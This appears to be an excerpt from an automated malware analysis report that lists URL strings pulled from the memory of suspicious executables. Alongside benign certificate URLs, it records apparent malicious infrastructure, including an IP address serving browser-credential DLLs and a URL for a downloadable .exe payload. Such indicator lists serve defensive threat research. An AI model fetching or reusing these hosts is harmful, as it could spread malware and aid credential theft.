Source: WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sextipolar.sbs/qwqw1b87bd06.$
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1713660413.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sextipolar.sbs/qwqwZ
Source: WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sextipolar.sbs/qwqwet
Source: WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sextipolar.sbs/qwqwetca
Source: WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sextipolar.sbs/qwqwtem32
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: is-OFQC1.tmp.25.dr	String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: is-OFQC1.tmp.25.dr	String found in binary or memory: http://t2.symcb.com0
Source: is-OFQC1.tmp.25.dr	String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: is-OFQC1.tmp.25.dr	String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: is-OFQC1.tmp.25.dr	String found in binary or memory: http://tl.symcd.com0&
Source: is-OFQC1.tmp.25.dr	String found in binary or memory: http://trolltech.com/xml/features/report-start-end-entity
Source: is-OFQC1.tmp.25.dr	String found in binary or memory: http://trolltech.com/xml/features/report-whitespace-only-CharData
Source: is-OFQC1.tmp.25.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: is-OFQC1.tmp.25.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: is-OFQC1.tmp.25.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: lmmycYk2THJ6kqlicmdyWtVT.exe, 0000000D.00000003.1992834957.0000000004A07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: ydYqwUL3GNS6IHkMgIteny78.exe, 00000009.00000002.2733749544.000001C5001C1000.00000004.00000800.00020000.00000000.sdmp, background.js.9.dr	String found in binary or memory: http://www.gzip.org/zlib/rfc-gzip.html
Source: FCK5Px_iTbBaGQTFBpzZeks2.exe, 00000012.00000003.2001572551.0000000002108000.00000004.00001000.00020000.00000000.sdmp, FCK5Px_iTbBaGQTFBpzZeks2.tmp, 00000019.00000000.2034256037.0000000000401000.00000020.00000001.01000000.00000017.sdmp	String found in binary or memory: http://www.innosetup.com/
Source: ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3136763184.00000000018EC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: FCK5Px_iTbBaGQTFBpzZeks2.exe, 00000012.00000003.1942644653.0000000002330000.00000004.00001000.00020000.00000000.sdmp, FCK5Px_iTbBaGQTFBpzZeks2.exe, 00000012.00000002.3126939578.0000000002101000.00000004.00001000.00020000.00000000.sdmp, FCK5Px_iTbBaGQTFBpzZeks2.tmp, 00000019.00000003.2053700608.00000000020D8000.00000004.00001000.00020000.00000000.sdmp, FCK5Px_iTbBaGQTFBpzZeks2.tmp, 00000019.00000002.3127247795.0000000000765000.00000004.00000020.00020000.00000000.sdmp, FCK5Px_iTbBaGQTFBpzZeks2.tmp, 00000019.00000003.2053524562.0000000003120000.00000004.00001000.00020000.00000000.sdmp, FCK5Px_iTbBaGQTFBpzZeks2.tmp, 00000019.00000002.3128579767.00000000020D8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.mpegla.com
Source: FCK5Px_iTbBaGQTFBpzZeks2.exe, 00000012.00000003.2001572551.0000000002108000.00000004.00001000.00020000.00000000.sdmp, FCK5Px_iTbBaGQTFBpzZeks2.tmp, 00000019.00000000.2034256037.0000000000401000.00000020.00000001.01000000.00000017.sdmp	String found in binary or memory: http://www.remobjects.com/ps
Source: FCK5Px_iTbBaGQTFBpzZeks2.exe, 00000012.00000003.2001572551.0000000002108000.00000004.00001000.00020000.00000000.sdmp, FCK5Px_iTbBaGQTFBpzZeks2.tmp, 00000019.00000000.2034256037.0000000000401000.00000020.00000001.01000000.00000017.sdmp	String found in binary or memory: http://www.remobjects.com/psU
Source: RegAsm.exe, 00000017.00000002.3215948987.000000001BD6D000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3156266876.0000000015DC6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: softjenimmp3converter.exe, 0000002E.00000003.2131244589.000000000261A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2547218346.0000000000515000.00000002.00000001.01000000.00000006.sdmp, ZzpT5hwyVjlAXfLjB1r1iwOX.exe, 0000000C.00000002.3123029988.0000000000901000.00000040.00000001.01000000.0000000C.sdmp, H14SDf_AWcPvvQK5Xx97sISX.exe, 00000010.00000002.3125680466.0000000000516000.00000002.00000001.01000000.00000011.sdmp, ifM1E2HUtOYe96efnF4a_sDH.exe, 00000011.00000002.3123015429.0000000000BFF000.00000002.00000001.01000000.00000010.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2538050137.0000000000515000.00000002.00000001.01000000.00000014.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000002.2547218346.0000000000515000.00000002.00000001.01000000.00000006.sdmp, H14SDf_AWcPvvQK5Xx97sISX.exe, 00000010.00000002.3125680466.0000000000516000.00000002.00000001.01000000.00000011.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000002.2538050137.0000000000515000.00000002.00000001.01000000.00000014.sdmp	String found in binary or memory: http://www.winimage.com/zLibDllDpRTpR
Source: ifM1E2HUtOYe96efnF4a_sDH.exe, 00000011.00000002.3123015429.0000000000BFF000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.winimage.com/zLibDllm_object
Source: is-OFQC1.tmp.25.dr	String found in binary or memory: http://xml.org/sax/features/namespace-prefixes
Source: is-OFQC1.tmp.25.dr	String found in binary or memory: http://xml.org/sax/features/namespaces
Source: is-OFQC1.tmp.25.dr	String found in binary or memory: http://xml.org/sax/features/namespaceshttp://xml.org/sax/features/namespace-prefixeshttp://trolltech
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42/
Source: RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000606000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000
Source: RegAsm.exe, 00000017.00000002.3121845008.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/
Source: RegAsm.exe, 00000017.00000002.3121845008.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/7153le
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/9
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/A
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/B
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/I
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/Q
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/X
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/a
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/d6
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/freebl3.dll
Source: RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/freebl3.dllEdge
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/freebl3.dllo
Source: RegAsm.exe, 00000017.00000002.3121845008.0000000000528000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/mozglue.dll
Source: RegAsm.exe, 00000017.00000002.3121845008.0000000000528000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/mozglue.dllEdge
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/mozglue.dllc~
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/mozglue.dllq
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/mozglue.dllx
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/msvcp140.dll
Source: RegAsm.exe, 00000017.00000002.3121845008.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/msvcp140.dlldge
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/msvcp140.dlly
Source: RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/ng
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000F4D000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/nss3.dll
Source: RegAsm.exe, 00000017.00000002.3121845008.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/nss3.dllft
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/soft
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/softokn3.dll
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/softokn3.dll;
Source: RegAsm.exe, 00000017.00000002.3121845008.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/softokn3.dlldge
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/softokn3.dll~
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/sqlx.dll1
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/sqlx.dll;
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/t6
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/vcruntime140.dll
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000F4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/vcruntime140.dll&
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/vcruntime140.dll(
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/vcruntime140.dll4
Source: RegAsm.exe, 00000017.00000002.3121845008.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/vcruntime140.dllUser
Source: RegAsm.exe, 00000017.00000002.3121845008.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/vcruntime140.dll_7)
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000F4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/vcruntime140.dlle
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000F4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/vcruntime140.dllets
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000F4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000/vcruntime140.dllpet
Source: RegAsm.exe, 00000017.00000002.3121845008.000000000056C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000e7153le
Source: RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000ing
Source: RegAsm.exe, 00000017.00000002.3121845008.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000l
Source: RegAsm.exe, 00000017.00000002.3121845008.000000000052E000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000seelse
Source: RegAsm.exe, 00000017.00000002.3121845008.000000000056C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.245.42:9000vcruntime140.dll_7)
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2397250157.0000000005E9E000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2378223753.0000000005E88000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2378676835.0000000005FEA000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2399977559.0000000006027000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2394268324.0000000006009000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: wDFs1SzoVQiT2__nQmbIm6Rg.exe, 00000013.00000002.1955136682.0000000000315000.00000004.00000001.01000000.00000013.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://carthewasher.net/
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C1E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1732890461.0000000004232000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1727787269.0000000004232000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724263292.0000000004226000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://carthewasher.net/038bcf3a84a6c65c7cd47ac3b64b7f9b/cad54ba5b01423b1af8ec10ab5719d97.exe
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2397250157.0000000005E9E000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2378223753.0000000005E88000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2378676835.0000000005FEA000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2399977559.0000000006027000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2394268324.0000000006009000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2397250157.0000000005E9E000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2378223753.0000000005E88000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2378676835.0000000005FEA000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2399977559.0000000006027000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2394268324.0000000006009000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2397250157.0000000005E9E000.00000004.00000020.00020000.00000000.sdmp, hvkESMr10WtP7_E6btIJmDx0.exe, 00000007.00000003.2378223753.0000000005E88000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2378676835.0000000005FEA000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2399977559.0000000006027000.00000004.00000020.00020000.00000000.sdmp, rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2394268324.0000000006009000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: WlCIinu0yp.exe, 00000000.00000003.1755615554.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1723501754.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1725414219.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp, WlCIinu0yp.exe, 00000000.00000003.1724451613.0000000002C2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cheremushki.net/
Source: RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=tIrWyaxi8A
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&am
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engli
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=en
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=roSu
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&l=englis
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&l=
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&l=engli
Source: RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=gzzYk5pkHqW6&amp
Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=engl
Source: RegAsm.exe, 00000017.00000002.3121845008.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=
